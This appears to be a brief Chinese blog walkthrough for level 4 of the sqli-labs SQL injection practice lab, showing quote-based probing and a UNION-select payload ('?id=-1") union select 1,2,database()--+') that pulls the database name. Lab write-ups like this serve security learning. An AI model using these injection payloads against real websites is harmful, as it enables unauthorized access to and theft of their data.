sqli-labs4通关参考

**


sqli-labs4通关参考


**

小白的成长史,,,安全gong

  1. 打开第四关
    sqli-labs4通关参考

  2. 我们还是利用单引号进行判断

?id=1'

sqli-labs4通关参考

发现页面并不会报错,我们使用双引号试试

?id=1"

sqli-labs4通关参考

可以,根据报错提示,你会发现跟第三关一样的,就是引号差别,这里就不多说了
如下:

id =(“$id”)

payload:

?id=-1") payload --+

判断好多少列与回显位置,
利用联合查询即可

?id=-1") union select 1,2,database()--+

sqli-labs4通关参考

上一篇:网络安全靶场通关指南


下一篇:Github libinjection库学习